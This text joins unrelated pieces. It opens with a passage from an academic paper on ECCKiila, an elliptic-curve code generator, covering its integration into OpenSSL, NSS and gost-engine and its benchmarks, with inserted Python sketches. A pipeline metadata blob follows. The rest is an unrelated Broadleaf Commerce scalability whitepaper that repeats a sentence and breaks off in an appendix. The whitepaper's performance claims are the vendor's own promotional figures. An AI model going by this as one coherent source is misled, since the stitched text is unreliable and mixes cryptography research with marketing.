that handles even scalars; the regular-NAF encoding itself is also constant time.
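A minimal sketch of fixed-length regular signed-digit recoding in the spirit of regular-NAF (this is our own simplified variant, not ECCKiila's generated code): every digit is odd and the digit count is fixed by the scalar length, so the main loop shape is scalar-independent; even scalars are handled by recoding $k+1$ plus one trailing subtraction.

```python
# Fixed-length regular signed-digit recoding sketch (simplified variant
# in the spirit of regular-NAF; not ECCKiila's generated code).

def regular_recode(k, w, t):
    """Recode odd k into exactly t odd digits d_i with
    k == sum(d_i * 2**(w*i)); the loop shape is independent of k."""
    assert k & 1, "regular recoding expects an odd scalar"
    digits = []
    for _ in range(t - 1):
        d = (k % (1 << (w + 1))) - (1 << w)   # odd digit in [1 - 2^w, 2^w - 1]
        digits.append(d)
        k = (k - d) >> w                      # remains odd and positive
    digits.append(k)                          # final (odd) digit
    return digits

def recode_even_aware(k, w, t):
    """Handle even k by recoding k + 1; the caller compensates with one
    trailing point subtraction (done as a constant-time conditional sub)."""
    adjust = 1 - (k & 1)          # 1 iff k is even
    return regular_recode(k + adjust, w, t), adjust
```

With $w = 5$ this needs only the odd multiples of the point in the table, which is the halving of precomputation mentioned above.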
We implemented double point multiplication using textbook wNAF [13, Sec. 9.1.4] combined with Shamir’s trick [13, Sec. 9.1.5]. This shares the doublings, i.e. at most $\lg(q)$ in number, and on average reduces the number of additions per scalar. This method is variable-time, which is acceptable because it is only required in digital signature verification, where all inputs are public. Rigging. At this point, the resulting C code yields functional arithmetic for the ECC layer. But we observe a gap between such code and real world projects. On one hand, researchers intimately familiar with ECC details lack the skill, motivation, and/or domain-specific knowledge to integrate the ECC stack into downstream large software projects. On the other hand, developers for those downstream projects lack the intimate knowledge of the upstream ECC layer to integrate properly; historical issues include assumptions on architecture, alignment, endianness, and supported ranges, to name a few. For example, one obscure issue encountered during OpenSSL ECCKiila integration was the lack of OpenSSL unit testing for custom ECC group base points, which OpenSSL supports but ECCKiila cannot fully accelerate since the generated LUTs are static; the integration must nonetheless detect and handle the base point mismatch. Our integrations passed all OpenSSL unit tests even when this corner case was mishandled, precisely because no existing unit test exercised it. To solve this issue, the last layer of ECCKiila is rigging, which is essentially plumbing for downstream projects. Rigging is library-specific by nature, and ECCKiila currently supports three back-ends: OpenSSL, NSS, and gost-engine. For OpenSSL, ECCKiila generates an EC_GROUP structure, which is the OpenSSL internal representation of a curve with function pointers for various operations. We designed simple wrappers for three relevant function pointers, which are shallow and eventually (after sanity checking arguments and transforming the inputs to the expected format) call the corresponding scalar multiplication implementation in Figure 1.
NSS is similar, with an ECGroup structure. The gost-engine rigging (mostly) decouples it from OpenSSL’s EC module, since it only needs to support GOST curves with explicit parameters. Example: P-384 in OpenSSL and NSS. What follows is a walkthrough of our integration of secp384r1 into OpenSSL and NSS. ECCKiila has a large database (JSON) of standard curves, and generates both 64-bit and 32-bit $GF(p)$ arithmetic using Fiat. It then takes the $h = 1$, $a = -3$ path in Figure 1 and generates the three relevant scalar multiplication functions that utilize exception-free formulas from [38] optimized for $a = -3$. Finally, ECCKiila emits the OpenSSL rigging for OpenSSL integration, and NSS rigging for NSS integration. Adding the code to OpenSSL is the only current manual step: one line to add the new code to the build system, one line to add the prototype of the new EC_METHOD structure in a header, and one line to point OpenSSL at this structure for the secp384r1 definition. The NSS integration is very similar. Example: GOST twisted 256-bit curve. What follows is a walkthrough of our integration of id_tc26_gost_3410_2012_256_paramSetA into gost-engine. ECCKiila takes the $h = 4$, $e = 1$ path in Figure 1 and generates the three relevant scalar multiplication functions that utilize exception-free formulas from [22] optimized for \( e = 1 \), noting the \( E_w \) to \( E_t \) mappings (and back) are transparent to the caller (the gost-engine rigging, in this case). Finally, ECCKiila emits the gost-engine rigging; enabling this code in gost-engine is currently the only manual step: one line to add the code to the gost-engine build system, and three lines in a C switch statement to enable each of the relevant scalar multiplication routines.
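Both walkthroughs boil down to template-driven code emission (Mako in ECCKiila). A dependency-free sketch of the idea using the stdlib's `string.Template`; the `point_mul_<curve>` naming scheme is hypothetical, for illustration only.

```python
# Template-driven emission of per-curve C prototypes, sketched with the
# stdlib string.Template; ECCKiila itself uses Mako templates. The naming
# scheme point_mul_<curve> here is hypothetical, for illustration only.
from string import Template

PROTO = Template(
    "void point_mul_${curve}(pt_t *r, const sc_t *k, const pt_t *p);\n"
)

def emit_prototypes(curves):
    return "".join(PROTO.substitute(curve=c) for c in curves)

print(emit_prototypes(["secp384r1", "id_tc26_gost_3410_2012_256_paramSetA"]))
```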
**Example: million dollar curve in OpenSSL.** Not to limit ECCKiila to only formally standardized curves, here we showcase the research value of ECCKiila by applying it to MDCurve20160 [5], which has undergone no formal standardization process. As such, we took the GOST approach: perhaps the \( E_w \) curve might be standardized, with the \( E_t \) curve utilized internally. We applaud this approach in GOST because, in practice, it eases downstream integration and lowers the effort bar during standardization; on the downside, it does reduce flexibility since it implies compliance with certain existing (legacy) standards. The process for ECCKiila is a logical mix of the previous two examples: taking a path similar to the GOST example, but the generated rigging is for OpenSSL. In this case, OpenSSL knows nothing about MDCurve20160, so we obtained an unofficial OID for MDCurve20160 and the rigging additionally emits the explicit curve parameters so OpenSSL knows how to construct its internal ECC group. The only manual steps are similar to the previous examples, with the addition of inserting these parameters. Once OpenSSL knows about MDCurve20160 from the automated rigging, it can drive operations with MDCurve20160 like any other (legacy) curve: ECC key generation, ECDSA signing and verifying, and ECC CDH key agreement. This highlights the research value of ECCKiila, and gives a clear and simple path for researchers seeking dissemination and exploitation: obtain an official OID for standardization, provide curve parameters to ECCKiila, and submit a PR to downstream projects. In the case that more modern signature and key agreement schemes are desired, additional steps are needed at the standardization, implementation, and integration levels. ### 4.1 ECCKiila: results We now present the results of applying ECCKiila to the curves listed in Table 1.
First, it is important to note our measurements are not on the ECCKiila code directly, but rather on the application-level view of how developers and users of the corresponding libraries will transparently see the resulting performance difference. That is, we are measuring the **full integration**, not the ECCKiila code in isolation. So it includes e.g. all overheads from the rigging, any checks and serialization/deserialization the libraries perform, any memory allocation/deallocation and structure initialization, as well as any other required arithmetic not part of ECCKiila (e.g. \( GF(q) \) arithmetic for ECDSA and GOST signatures). To compare the performance of our approach, we measure the timing of unmodified OpenSSL 3.0 alpha, gost-engine, and NSS 3.53 (called **baseline**), and the same versions then modified with the ECCKiila output (**integration**). For each of them, we measured the timings of the operations described in Section 2: key generation, key agreement (derivation), signing, and verification. For the sake of simplicity, we refer to them as keygen, derive, sign, and verify, respectively. The hardware and software setup used to get the timings reported in this section is the following: Intel Xeon Silver 4116 2.10GHz, Ubuntu 16.04 LTS “Xenial”, GNU11 C, and clang-10. We used 64-bit builds, although the ECCKiila generated code selects the correct implementation using the compiler’s preprocessor at build time. For the clock cycle measurements, we used the newspeed utility, unifying the OpenSSL and gost-engine measurements since it works through OpenSSL’s EVP interface and optionally supports engines. For the two NSS results, we modified their ecperf benchmarking utility to report median clock cycles instead of wall clock time. Table 2 reports timings for both approaches, showing that our proposal performs well compared to the original versions. There are several nuances to clarify in the data.
In particular, for signing, \( id\_Gost3410\_2001\_CryptoPro\_A\_ParamSet \) is faster than secp256k1: the reason is that GOST signatures do not invert modulo \( q \) while ECDSA signatures do, and this is a costly operation. Also, we can see that secp256r1 has excellent performance due to manual AVX assembler optimizations, while ECCKiila is portable C.

**Table 1: List of all the curves tested with ECCKiila** (for each curve: the library, the external model used at the standard level, the internal model, and \(\lg q\))

### 5 CONCLUSION

In this work, we presented two methodologies. ECCKAT allows carrying out a set of tests over an arbitrary ECC implementation, including (but not limited to) all standard curves from OpenSSL, NSS, and gost-engine, where it gave us excellent results because we uncovered several novel defects in OpenSSL such as a scalar multiplication failure and an ECC CDH vulnerability. Meanwhile, for GOST we detected a VKO vulnerability that can reveal sensitive information from the private key. Our second proposal, ECCKiila, is partially motivated by these vulnerabilities. With the use of ECCKiila, we can generate code dynamically for any curve, including all standard curves from OpenSSL, NSS, and GOST.

---
\(^{11}\)https://github.com/romen/newspeed
\(^{12}\)https://github.com/nss-dev/nss/tree/master/cmd/ecperf
This code is highly competitive in comparison with the original versions from OpenSSL, NSS, and gost-engine, since we see a speedup factor of up to 9.5x for key generation, 4.5x for key agreement, 13.3x for signing, and 3.7x for verifying, as Table 2 shows. Furthermore, ECCKiila is flexible and robust, since we can easily add new curves without increasing the complexity of the development, upstream or downstream. Hence, we believe our methodologies are of interest for future work, both in research and application. Quoting Davis [14], programmers need “turnkey” cryptography, not only cryptographic toolkits, and that is precisely what ECCKiila provides. The ease of integrating these stacks in downstream projects, coupled with formal verification guarantees on the Galois field arithmetic, simplicity of the upper layers, and automated code generation, provides drop-in, zero-maintenance solutions for real-world, security-critical libraries. We release ECCKiila\(^{13}\) as FOSS, furthermore in support of Open Science.

**Acknowledgments.** This project has received funding from the European Research Council (ERC) under the European Union’s Horizon 2020 research and innovation programme (grant agreement No 804476).

\(^{13}\)https://gitlab.com/nisec/ecckiila

**Table 2:** Comparison of timings between the baseline and the integration from OpenSSL, gost-engine, and NSS. All timings are reported in clock cycles (thousands).

**REFERENCES**
{"Source-Url": "https://export.arxiv.org/pdf/2007.11481", "len_cl100k_base": 15024, "olmocr-version": "0.1.49", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 42522, "total-output-tokens": 17033, "length": "2e13", "weborganizer": {"__label__adult": 0.0004992485046386719, "__label__art_design": 0.0004820823669433594, "__label__crime_law": 0.001003265380859375, "__label__education_jobs": 0.0008373260498046875, "__label__entertainment": 0.00012373924255371094, "__label__fashion_beauty": 0.0002090930938720703, "__label__finance_business": 0.0006012916564941406, "__label__food_dining": 0.0003490447998046875, "__label__games": 0.0011148452758789062, "__label__hardware": 0.0019350051879882812, "__label__health": 0.0007772445678710938, "__label__history": 0.0006189346313476562, "__label__home_hobbies": 0.00014603137969970703, "__label__industrial": 0.0009183883666992188, "__label__literature": 0.0003330707550048828, "__label__politics": 0.000423431396484375, "__label__religion": 0.0007123947143554688, "__label__science_tech": 0.31494140625, "__label__social_life": 0.00013685226440429688, "__label__software": 0.01617431640625, "__label__software_dev": 0.65625, "__label__sports_fitness": 0.00042939186096191406, "__label__transportation": 0.0007348060607910156, "__label__travel": 0.0002627372741699219}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 67193, 0.05222]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 67193, 0.49314]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 67193, 0.88675]], "google_gemma-3-12b-it_contains_pii": [[0, 5485, false], [5485, 11486, null], [11486, 17304, null], [17304, 23820, null], [23820, 30673, null], [30673, 44785, null], [44785, 49282, null], [49282, 56326, null], [56326, 62055, null], [62055, 67193, null], [67193, 67193, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5485, 
true], [5485, 11486, null], [11486, 17304, null], [17304, 23820, null], [23820, 30673, null], [30673, 44785, null], [44785, 49282, null], [49282, 56326, null], [56326, 62055, null], [62055, 67193, null], [67193, 67193, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 67193, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 67193, null]], "pdf_page_numbers": [[0, 5485, 1], [5485, 11486, 2], [11486, 17304, 3], [17304, 23820, 4], [23820, 30673, 5], [30673, 44785, 6], [44785, 49282, 7], [49282, 56326, 8], [56326, 62055, 9], [62055, 67193, 10], [67193, 67193, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 67193, 0.05742]]}
olmocr_science_pdfs
2024-11-25
2024-11-25
74c16f117e8c742ee3c5ea42236bb6277c6c2cd6
scalability noun the capacity to be changed in size or scale; the ability of a computing process to be used or produced in a range of capabilities. # Table of Contents Introduction ...................................................................... 4 Test Methodology .............................................................. 5 ## Test Results ........................................................................ 8 - Throughput 9 - Concurrent Users 10 - Data Variations 11 - Catalog Size 12 - Conversion Rates 13 Considerations ...................................................................... 15 - Cost 16 - Culture 17 - Caching 19 - Auto Scale 20 - Database 20 - CDN 21 - Third Party Integrations 21 - Customizations 21 Conclusion ........................................................................ 22 Appendices ........................................................................ 24 Meet the Author JEFF FISCHER Introduction Broadleaf Commerce (Broadleaf) provides companies with a platform for building high performance commerce solutions. Based on best of breed open source technologies including the Spring Framework, Broadleaf was designed from the ground up to be extensible and scalable for businesses and institutions requiring a mission critical eCommerce solution. With a robust microservices architecture, Broadleaf embraces the latest thought in software architecture principles and practice. Coupled with our innovations in advanced composable commerce, Broadleaf provides a forward-thinking architecture that can fit into any infrastructure budget. This paper provides details of scalability tests performed with the Broadleaf Commerce Microservices reference implementation. Testing was completed using a range of node size combinations in a standard kubernetes cluster in the cloud. 
With the ability to easily scale to thousands of transactions per second across tens of thousands of concurrent users and millions of products, the test results speak for themselves. Note, for details on configuration and test plan specifics, refer to the appendices at the end of the document. Section 1 Test Methodology Simulating real-world shopping scenarios with industry average conversion rates How to read the charts in this study For this paper, we have employed a naming scheme that combines application and infrastructure sizing into a shortened name for easy reference. Throughout this document, you will see chart references to items such as “BS3”, or “GL5”. Refer to the chart below to understand how these terms relate to application and infrastructure resources. <table> <thead> <tr> <th>Application FlexPackage™️</th> <th>Kubernetes Infrastructure</th> <th>Label</th> </tr> </thead> <tbody> <tr> <td>Min</td> <td>Small; 1 4-core Node</td> <td>MS1</td> </tr> <tr> <td>Balanced</td> <td>Small; 3 4-core Nodes</td> <td>BS3</td> </tr> <tr> <td>Balanced</td> <td>Small; 5 4-core Nodes</td> <td>BS5</td> </tr> <tr> <td>Balanced</td> <td>Medium; 3 8-core Nodes</td> <td>BM3</td> </tr> <tr> <td>Balanced</td> <td>Medium; 5 8-core Nodes</td> <td>BM5</td> </tr> <tr> <td>Balanced</td> <td>Large; 3 16-core Nodes</td> <td>BL3</td> </tr> <tr> <td>Balanced</td> <td>Large; 5 16-core Nodes</td> <td>BL5</td> </tr> <tr> <td>Granular</td> <td>Large; 3 16-core Nodes</td> <td>GL3</td> </tr> <tr> <td>Granular</td> <td>Large; 5 16-core Nodes</td> <td>GL5</td> </tr> </tbody> </table> See the “Considerations” section (specifically “Cost” and “Culture”) for more details on FlexPackage™️ options. Simulating real-world scenarios when testing an e-commerce application is critical in determining not only how efficiently the software performs under normal circumstances, but also how many users it can serve during peak demand. 
While testing up to a 100% conversion rate to ensure performance on “Black Friday” and “Cyber Monday” behavior was accounted for, most test cases conducted an average 10% add-to-cart action and an aggregated 3% conversion rate. In all cases, Broadleaf set out to report objective scalability numbers. In isolation, test cases for “home page views” or “orders” have no merit outside of simulated consumer behavior. The ability for a system to handle hundreds of millions of views to a single page without any other variable is a useless statistic in itself. Furthermore, test cases with varying concurrent user numbers hold no value unless tested against concurrent user behavior. A test was considered “passing” if the Broadleaf framework generally responded to API calls with an average response time of 500 ms, or less. Furthermore, real world usage of microservice APIs often require several calls to fulfill a concept, such as rendering a product detail page. In these cases, we also measured the aggregate response time of all API calls involved to complete the overall user experience and confirmed the sum of timings was generally less than 1 second. Finally, test cases were given a several minute warm up time followed by a 2 minute ramp-up period before experiencing peak load. Refer to Appendix C for more details on the approach. Note on nomenclature - For this paper, we have employed a naming scheme that combines application and infrastructure sizing into a shortened name for easy reference. Throughout this document, you will see chart references to items such as “BS3”, or “GL5”. Refer to the chart below to understand how these terms relate to application and infrastructure resources. Section 2 Test Results Against high traffic, large product catalogs, and peak season spikes, Broadleaf Commerce proves the ability to handle the most stringent scalability requirements. 1. Throughput Peak demand is defined based on industry, customer base, and seasonality. 
Through all major peak eCommerce variables, Broadleaf proves the ability to scale. Across high transaction volume, concurrent users, large catalogs, and high conversion rates, Broadleaf exhibits consistent peak performance. For test purposes, Broadleaf focuses on throughput as it relates to completed transactions per second (TPS), and completed orders per second (OPS). A transaction in this context refers to an individual microservice API call to complete a unit of functionality as it relates to the overall ecommerce test plan. Refer to Appendix A for more details on the test plans used. By adding replicas of application microservices to a growing kubernetes cluster, we demonstrate fairly linear scale as we seek to increase throughput. The initial test focuses on the classic heavy browse use case culminating in a 3% conversion rate to completed orders. Such a case involves significant user activity in the areas of search, catalog browsing, and registered customer login and account perusal. A 10K product catalog is used in all cases, unless otherwise specified. In this round of tests, the Balanced FlexPackage™ throughput was examined through small, medium, and large infrastructure configurations, culminating in 3400 TPS for the system. The Granular FlexPackage™ was also considered at the larger infrastructure sizes and performed comparably. Spoiler alert - for extreme scale, refer to the Conversion Rate results section, where we demonstrate scaling to 100 orders per second using conventional techniques alone. **Broadleaf demonstrated horizontal scalability, handling 3400 transactions per second at the largest size tested** 2. Concurrent Users In order to simulate concurrent users in a real world scenario, Broadleaf tested virtual users in gated test plans involving percentage advancement at various stages of the customer journey, coupled with quantity and catalog choice randomization. 
Then, calculating based on an eCommerce average of 1 page view per minute per user, we were able to estimate concurrent user capacities. Broadleaf demonstrated the ability to handle tens of thousands of concurrent users For companies needing to accommodate even more users (e.g., companies that want to be the next Amazon, Facebook, or Twitter), infrastructure build out and serious application performance tuning can be handled with Broadleaf’s Professional Services. For most businesses with typical conversion rates, the numbers demonstrated above can handle sites generating billions of dollars in sales. 3. Data Variations While the 3% conversion rate test plan is interesting on its own, it is important to consider the impact of catalog complexity. In this round of tests, we introduce two factors: discounts and variants/options. Discounts can slow down cart manipulation as it introduces additional calculation required to price items in the cart. Variants (aka Skus) and product options also represent additional catalog complexity for the system to navigate as it addresses inventory and pricing concerns across a larger landscape of customer choice. 100 BOGO offers were introduced into the system - all set to auto apply. This setting indicates that all offers are qualified against the cart contents at the time of add to cart, which is a key computational moment in the cart lifecycle. The effect was a little more noticeable in this case, but overall still not an unfavorable impact at any size tested. Two different tests were run. First, 3 variants per product were introduced with a basic set of product options for the test to negotiate upon add to cart. When compared to normal execution (no variants), the impact was negligible, within a margin of error. Broadleaf demonstrated the ability to handle variations in data complexity with negligible impact. 4. 
Catalog Size For corporations requiring larger catalog sets, Broadleaf tested an online catalog with 100,000 and 1,000,000 products. Broadleaf Commerce demonstrated the ability to handle wide variations in catalog size with negligible impact. This test focuses on the order life cycle journey using a test plan starting with the product detail page and ending in cart checkout. This test plan is similar to the 100% conversion rate test plan detailed later in this document. Again, we see a negligible impact to performance based on catalog size across all infrastructure combinations. 5. Conversion Rates For corporations with increased conversion rates above industry averages, Broadleaf tested up to 100% conversion. The key metric captured for this test is orders per second (OPS). At the highest tier tested (BL5) using a heavy browse test plan (similar to the standard 3% conversion test plan), Broadleaf demonstrated a volume of 13.83 OPS at a 50% conversion rate. This translates into about 50K order per hour. This type of traffic may be common for some retailers during Black Friday style shopping scenarios. Given an industry standard average order value (AOV) of $128, Broadleaf Commerce can comfortably support billions in revenue on a reasonable hardware budget. Checkout focused results are often requested as well. This type of test plan lightens the browse requirements, and instead opts for an order focused journey. This solely considers the product detail page, and beyond to checkout and order completion - at 100% conversion rate. This type of flow is common with highly targeted product offerings, usually with a small product count. We were able to demonstrate the extreme case of 100 OPS using conventional horizontal scale techniques. For this high end case, we utilized a cluster composed of (6) 16 core nodes, (8) 8 core nodes, and (4) 4 core nodes. We also employed a 16 core cloud native database as the backing datastore. 
Refer to Appendix A for more detailed information on this test plan. Broadleaf Commerce demonstrated the ability to scale to an extreme 100 OPS using conventional horizontal scale. Section 3 Considerations There are plenty of options that can assist with achieving a Broadleaf installation that is optimized for performance and cost. Cost Infrastructure cost is a major consideration when determining the right platform to leverage for your eCommerce solution. The right balance of infrastructure spend weighed against throughput and revenue expectations is important to estimate carefully ahead of time. To further complicate the issue, modern architecture best practices call for a microservice approach, which affords many benefits, but tends to come at a higher infrastructure cost to support the granular service count. Broadleaf understands these challenges and has come up with an innovative approach to address these issues, without inhibiting future growth. Broadleaf has introduced an infrastructure composability concept entitled FlexPackages™. **A FlexPackage™ is a unit of composition that conserves all of the basic plumbing and components that make up the base of the microservice platform.** Configured on top are the unique components and API that inhabit individual, granular microservices. By putting multiple microservices together into a single FlexPackage™, you can conserve greatly on the complexity and quantity of infrastructure needed to support the stack, while at the same time completely honoring bounded context restrictions and design boundaries. The persistence tier is still isolated per microservice, and the endpoint APIs and asynchronous messaging tier are solely used for inter-service communication. Broadleaf currently ships in the neighborhood of 25 granular microservices. However, we also expose configuration for the Balanced FlexPackage™ that combines these microservices into 4 primary components: Cart, Browse, Supporting, and Processing. 
Doing so, we are able to comfortably realize smaller infrastructure deployments that would not be feasible with that many individual microservices. And, via configuration alone, the microservices can be combined into other combinations, or broken apart completely into the original, granular representations. This is a powerful feature allowing you to model your infrastructure to match your revenue growth, or IT culture. We call this **Advanced Composable Commerce**, as the FlexPackage™ allows you to model multiple vectors of composability. With microservices, you can choose the features and functions that make sense for your business. With FlexPackages™, you can extend that flexibility into the infrastructure domain. You can also consider savings across multiple environments. For example, with the same codebase, you can package differently for dev, qa, and prod. The possibilities are limitless. Refer to Appendix D for more information on the default FlexPackages™ used, and the components they contain. **Culture** IT Culture is another factor, in addition to cost, that can influence decisions regarding FlexPackage™ choice. Team structures that honor traditional microservice isolation boundaries are likely to favor the most granular representation of each microservice. This type of team tends to operate in a silo and often ships code with a higher frequency - shortening overall time to value. On the other hand, multi-discipline teams may choose to cover multiple bounded contexts and favor shipping less often, or with reduced devops complexity, by reducing microservice count through FlexPackage™ composition. There are pros and cons with both extremes, and there are a spectrum of levels between. 
**The reality is that IT culture doesn’t always match up nicely with technical innovation, and the FlexPackage™ concept can help soften the devops transition.** If organizations choose to adopt more devops complexity, the FlexPackage™ pattern can help with that transition without requiring code refactoring. Caching Broadleaf leverages the Spring Cache abstraction in key flows for performance benefit. The out-of-the-box implementation we employ leverages Apache Ignite. By using Ignite, we get the benefit of a robust cache architecture, including its features around off-heap cache. By storing cache members off-heap, the burden on the JVM to garbage collect frequent evictions is removed. This benefits the overall GC posture of the application and further stabilizes performance. With default settings, we find that Ignite allocates immediately 256 MB of off-heap memory as a bucket for cache. During our testing, with the caches we provide out-of-the-box, we never exceeded that initial bucket. In fact, we routinely only used about 64 MB of it. Note that each microservice runtime with cache enabled will allocate off-heap memory in this way. While small, this should be accounted for when considering pod scheduling and node capacity. By default, we configure a basic TTL cache in a non-distributed configuration. This means that each microservice instance maintains its own copy of cache. This is the least blocking configuration and is something we generally favor for performance, at the cost of a delay in eviction in most cases. Ignite is flexible and is designed to be used as a distributed cache if needed. If more real time consistency is required, the cache can be configured in this manner, possibly at some throughput cost. Auto Scale Auto scale can be an effective mechanism for meeting occasional demand increase without keeping peak infrastructure available 24/7. By automatically scaling to need, you can decrease overall cost without sacrificing customer experience. 
Kubernetes provides auto scale features at both the pod and node level. As pod utilization meets configured thresholds, Kubernetes can spawn new replicas to absorb the increase in demand. Furthermore, as pod count exceeds capacity, Kubernetes can spawn additional nodes in the current node pool to create additional capacity for the pod increase. If enabled, Kubernetes will continue to do so until it reaches its configured limit. This configuration is enabled at the point where the infrastructure is provisioned. If using Terraform as we did, it is a setting for the resources in the Terraform template file. There are several factors to consider for auto scale. Broadleaf leverages Java and Spring. There is a startup time cost from initial application launch to the time when the application is ready to receive connections. Compound that with the time Kubernetes requires to spawn a new pod. Further compound that with the time Kubernetes requires to spawn a new node (this latter point is the most costly of the three). A new node is not always required if there is already enough capacity to handle the new pod. Further compound that with the time Kubernetes requires to spawn a new node (this latter point is the most costly of the three). A new node is not always required if there is already enough capacity to handle the new pod. Nonetheless, there is a real time-to-effectivity cost that must be taken into account when considering auto scale. You should not expect instant availability. There are a number of best practices for configuring the Kubernetes cluster autoscaler, horizontal pod autoscaler, and vertical pod autoscaler that can be found online. I won’t detail them all here. However, it is useful to consider demand scenarios and autoscale expectations. If you have ebb and flow of fairly gradual demand, the system will still provide acceptable customer experience under increased demand during the period in which the auto scale process is enacted. 
If you experience incredible spikes in traffic, you may outpace the scale-up timeline. In such a case, you should maintain additional hot resources to accommodate the spike, or pre-emptively scale up for a temporary timeframe if the spike can be predicted. Database The tests performed in this paper were all executed against a Postgres database (specifically a Google Cloud SQL instance provisioned outside the Kubernetes cluster). While Broadleaf also supports Mysql, MariaDB, and Oracle, our reference implementation leverages Postgres. We found the cloud sql implementation to be highly efficient, roughly equivalent to a similar database installed directly in the cluster. We also found Broadleaf’s usage of database resources to be highly efficient, contributing to an overall performance benefit. In general, the connection pool configured for the application was set to a count of 10. The only exception was the 100 OPS test, which used a connection pool size of 20. During test monitoring, we never found the active usage to exceed that threshold, with little or no blocking at acquisition. We also found that database vertical scale requirements were minimal as the application itself scaled. Most of the test cases required only an 8 or less CPU instance for the database. The exception was the 100 OPS extreme test, which used a 16 core instance. However, at that scale, that is a very acceptable sizing. For tuning the database itself, throughput levers for cloud native instances tend to be governed by sizing. Factors such as storage size, CPU count, and RAM can affect disk IO quota, network throughput, and max connection count, respectively. CDN The load test did not retrieve graphics or other static assets from the application container, nor did it engage the built-in asset server for any managed asset retrieval. Most high volume sites will benefit from having static assets delivered to users via a CDN (Content Delivery Network). 
CDN solutions offer hi-speed nodes located across the globe with delivery of your assets coming from the nodes closest to a given user. This serves to reduce response times for your application and lessens unnecessary load on your application container. Third Party Integrations Typical enterprise eCommerce systems can contain ten or more integrations. Each integration has the potential to negatively affect the scalability of the system. It is important to use best practices for integrating with other systems to ensure that one poorly performing third party integration does not bring down the entire system. Tuning strategies, including cache and circuit-breaker patterns, can help to avoid hotspots and maintain acceptable customer experience. Customizations The load tests reported in this paper were performed against a reference implementation of the Broadleaf Microservice Framework. As such, there was no custom code included in the test outside of what Broadleaf itself provides. Client implementations built on top of the Broadleaf Framework will necessarily include additional customizations, libraries, and integrations that can possibly contribute to performance degradation. For this reason, each new implementation should itself go through a load test analysis to qualify it as meeting performance expectations. Should you need it, Broadleaf provides professional services to help with performance tuning your implementation. Conclusion The Broadleaf Commerce framework scales across all testing metrics to meet the needs of even the most demanding eCommerce sites. Well known retailers and businesses depend on Broadleaf Commerce to power their eCommerce solutions, as Broadleaf provides best-in-class eCommerce capabilities at the highest value. 
*Broadleaf proved real business use cases across multiple scenarios, demonstrating:* - **Thousands of transactions per second** - **Tens of thousands of concurrent users** - **Millions of products** - **Billions of dollars worth of sales** Furthermore, the provided test results demonstrate that Broadleaf Commerce scales horizontally by adding additional microservice instances. This type of scaling is ideal for cloud based environments, especially those leveraging kubernetes. Finally, the results demonstrate that Broadleaf’s FlexPackage™ technology enables deployment of a large microservice architecture on a hardware footprint that can fit into any budget. For more information on Broadleaf, please visit: [www.broadleafcommerce.com](http://www.broadleafcommerce.com) Appendices Appendix A - Test Plan Standard, Browse Heavy Test Plan <table> <thead> <tr> <th>Component</th> <th>Percentage</th> </tr> </thead> <tbody> <tr> <td>Home Page</td> <td>100%</td> </tr> <tr> <td>Category Search API</td> <td>40%</td> </tr> <tr> <td>Category Details API</td> <td>40%</td> </tr> <tr> <td>Product API</td> <td>40%</td> </tr> <tr> <td>Product Details API</td> <td>40%</td> </tr> <tr> <td>Marketing Message API</td> <td>40%</td> </tr> <tr> <td>Product Search</td> <td>25%</td> </tr> <tr> <td>Login API</td> <td>20%</td> </tr> <tr> <td>Auth API</td> <td>20%</td> </tr> <tr> <td>Code API</td> <td>20%</td> </tr> <tr> <td>Token API</td> <td>20%</td> </tr> <tr> <td>Add To Card API</td> <td>10%</td> </tr> <tr> <td>Guest Token API</td> <td>6%</td> </tr> <tr> <td>Contact Info API</td> <td>6%</td> </tr> <tr> <td>Fulfillment Options API</td> <td>6%</td> </tr> <tr> <td>Fulfillment Group API</td> <td>6%</td> </tr> <tr> <td>Customers API</td> <td>5%</td> </tr> <tr> <td>Customers Stored Addresses API</td> <td>5%</td> </tr> <tr> <td>Customers Stored Payments API</td> <td>5%</td> </tr> <tr> <td>Payments API</td> <td>3%</td> </tr> <tr> <td>Checkout API</td> <td>3%</td> </tr> </tbody> </table> Order Focused 
